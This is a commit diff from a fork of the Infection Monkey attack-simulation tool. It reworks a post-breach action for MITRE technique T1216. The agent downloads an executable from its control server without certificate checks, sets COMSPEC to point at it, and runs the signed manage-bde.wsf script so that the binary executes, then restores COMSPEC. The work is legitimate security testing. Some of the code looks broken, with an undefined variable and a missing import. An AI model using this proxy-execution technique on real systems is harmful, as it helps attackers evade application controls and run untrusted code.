forked from p15670423/monkey
Code review changes
- smaller executable file; fetches it from the island when pba needs to run - technique configured off by default - other implementation changes
This commit is contained in:
parent
59f9752faf
commit
4b664031af
|
@ -325,6 +325,16 @@ class ControlClient(object):
|
|||
except requests.exceptions.RequestException:
|
||||
return False
|
||||
|
||||
@staticmethod
|
||||
def get_T1216_pba_file():
|
||||
try:
|
||||
return requests.get("https://%s/api/t1216-pba/download/" % WormConfiguration.current_server, # noqa: DUO123
|
||||
verify=False,
|
||||
proxies=ControlClient.proxies,
|
||||
stream=True)
|
||||
except requests.exceptions.RequestException:
|
||||
return False
|
||||
|
||||
@staticmethod
|
||||
def should_monkey_run(vulnerable_port: str) -> bool:
|
||||
if vulnerable_port and \
|
||||
|
|
|
@ -1,7 +1,10 @@
|
|||
import subprocess
|
||||
|
||||
from common.data.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC
|
||||
from infection_monkey.post_breach.pba import PBA
|
||||
from infection_monkey.post_breach.signed_script_proxy.signed_script_proxy import (
|
||||
cleanup_changes, get_commands_to_proxy_execution_using_signed_script)
|
||||
from infection_monkey.utils.environment import is_windows_os
|
||||
|
||||
|
||||
class SignedScriptProxyExecution(PBA):
|
||||
|
@ -10,4 +13,12 @@ class SignedScriptProxyExecution(PBA):
|
|||
super().__init__(POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC,
|
||||
windows_cmd=' '.join(windows_cmds))
|
||||
|
||||
cleanup_changes()
|
||||
def run(self):
|
||||
original_comspec = ''
|
||||
if is_windows_os():
|
||||
original_comspec =\
|
||||
subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116
|
||||
|
||||
super().run()
|
||||
|
||||
cleanup_changes(original_comspec)
|
||||
|
|
|
@ -11,6 +11,6 @@ def get_commands_to_proxy_execution_using_signed_script():
|
|||
return windows_cmds
|
||||
|
||||
|
||||
def cleanup_changes():
|
||||
def cleanup_changes(original_comspec):
|
||||
if is_windows_os():
|
||||
subprocess.run(get_windows_commands_to_reset_comspec(), shell=True) # noqa: DUO116
|
||||
subprocess.run(get_windows_commands_to_reset_comspec(original_comspec), shell=True) # noqa: DUO116
|
||||
|
|
Binary file not shown.
|
@ -1,16 +1,25 @@
|
|||
import subprocess
|
||||
from pathlib import Path
|
||||
|
||||
ORIGINAL_COMSPEC = r'C:\Windows\System32\cmd.exe'
|
||||
from infection_monkey.control import ControlClient
|
||||
|
||||
|
||||
def get_windows_commands_to_proxy_execution_using_signed_script():
|
||||
global ORIGINAL_COMSPEC
|
||||
ORIGINAL_COMSPEC = subprocess.check_output('echo %COMSPEC%', shell=True).decode() # noqa: DUO116
|
||||
# temp_comspec_path = ['infection_monkey', 'post_breach', 'signed_script_proxy', 'windows', 'random_executable.exe']
|
||||
# temp_comspec = Path(*temp_comspec_path)
|
||||
with ControlClient.get_T1216_pba_file() as r:
|
||||
with open(temp_comspec, 'wb') as f:
|
||||
shutil.copyfileobj(r.raw, f)
|
||||
|
||||
windir_path = subprocess.check_output('echo %WINDIR%', shell=True).decode().strip('\r\n') # noqa: DUO116
|
||||
signed_script_path = [windir_path, 'System32', 'manage-bde.wsf']
|
||||
signed_script = Path(*signed_script_path)
|
||||
|
||||
return [
|
||||
r'set comspec=infection_monkey\post_breach\signed_script_proxy\windows\random_executable.exe &&',
|
||||
r'cscript C:\Windows\System32\manage-bde.wsf'
|
||||
f'set comspec={temp_comspec} &&',
|
||||
f'cscript {signed_script}'
|
||||
]
|
||||
|
||||
|
||||
def get_windows_commands_to_reset_comspec():
|
||||
return f'set comspec={ORIGINAL_COMSPEC}'
|
||||
def get_windows_commands_to_reset_comspec(original_comspec):
|
||||
return f'set comspec={original_comspec}'
|
||||
|
|
|
@ -35,6 +35,8 @@ from monkey_island.cc.resources.pba_file_upload import FileUpload
|
|||
from monkey_island.cc.resources.remote_run import RemoteRun
|
||||
from monkey_island.cc.resources.reporting.report import Report
|
||||
from monkey_island.cc.resources.root import Root
|
||||
from monkey_island.cc.resources.T1216_pba_file_download import \
|
||||
T1216PBAFileDownload
|
||||
from monkey_island.cc.resources.telemetry import Telemetry
|
||||
from monkey_island.cc.resources.telemetry_feed import TelemetryFeed
|
||||
from monkey_island.cc.resources.test.clear_caches import ClearCaches
|
||||
|
@ -130,6 +132,7 @@ def init_api_resources(api):
|
|||
api.add_resource(Log, '/api/log', '/api/log/')
|
||||
api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
|
||||
api.add_resource(PBAFileDownload, '/api/pba/download/<string:path>')
|
||||
api.add_resource(T1216PBAFileDownload, '/api/t1216-pba/download/')
|
||||
api.add_resource(FileUpload, '/api/fileUpload/<string:file_type>',
|
||||
'/api/fileUpload/<string:file_type>?load=<string:filename>',
|
||||
'/api/fileUpload/<string:file_type>?restore=<string:filename>')
|
||||
|
|
|
@ -0,0 +1,15 @@
|
|||
from pathlib import Path
|
||||
|
||||
import flask_restful
|
||||
from flask import send_from_directory
|
||||
|
||||
|
||||
class T1216PBAFileDownload(flask_restful.Resource):
|
||||
"""
|
||||
File download endpoint used by monkey to download executable file for T1216 ("Signed Script Proxy Execution" PBA)
|
||||
"""
|
||||
|
||||
def get(self):
|
||||
executable_file_path = ['monkey_island', 'cc', 'resources', 'pba', 'T1216_random_executable.exe']
|
||||
executable_file = Path(*executable_file_path)
|
||||
return send_from_directory(executable_file)
|
Binary file not shown.
|
@ -189,7 +189,7 @@ SCHEMA = {
|
|||
"T1216": {
|
||||
"title": "Signed script proxy execution",
|
||||
"type": "bool",
|
||||
"value": True,
|
||||
"value": False,
|
||||
"necessary": False,
|
||||
"link": "https://attack.mitre.org/techniques/T1216",
|
||||
"description": "Adversaries may use scripts signed with trusted certificates to "
|
||||
|
|
|
@ -7,9 +7,9 @@ __author__ = "shreyamalviya"
|
|||
|
||||
class T1216(PostBreachTechnique):
|
||||
tech_id = "T1216"
|
||||
unscanned_msg = "Monkey didn't attempt to execute an arbitrary file with the help of a " +\
|
||||
unscanned_msg = "Monkey didn't attempt to execute an arbitrary program with the help of a " +\
|
||||
"pre-existing signed script since it didn't run on any Windows machines."
|
||||
scanned_msg = "Monkey attempted to execute an arbitrary file with the help of a " +\
|
||||
scanned_msg = "Monkey attempted to execute an arbitrary program with the help of a " +\
|
||||
"pre-existing signed script on Windows but failed."
|
||||
used_msg = "Monkey executed an arbitrary file with the help of a pre-existing signed script on Windows."
|
||||
used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows."
|
||||
pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC]
|
||||
|
|
|
@ -67,8 +67,7 @@ MONKEY = {
|
|||
"HiddenFiles",
|
||||
"TrapCommand",
|
||||
"ChangeSetuidSetgid",
|
||||
"ScheduleJobs",
|
||||
"SignedScriptProxyExecution"
|
||||
"ScheduleJobs"
|
||||
]
|
||||
},
|
||||
}
|
||||
|
|
Loading…
Reference in New Issue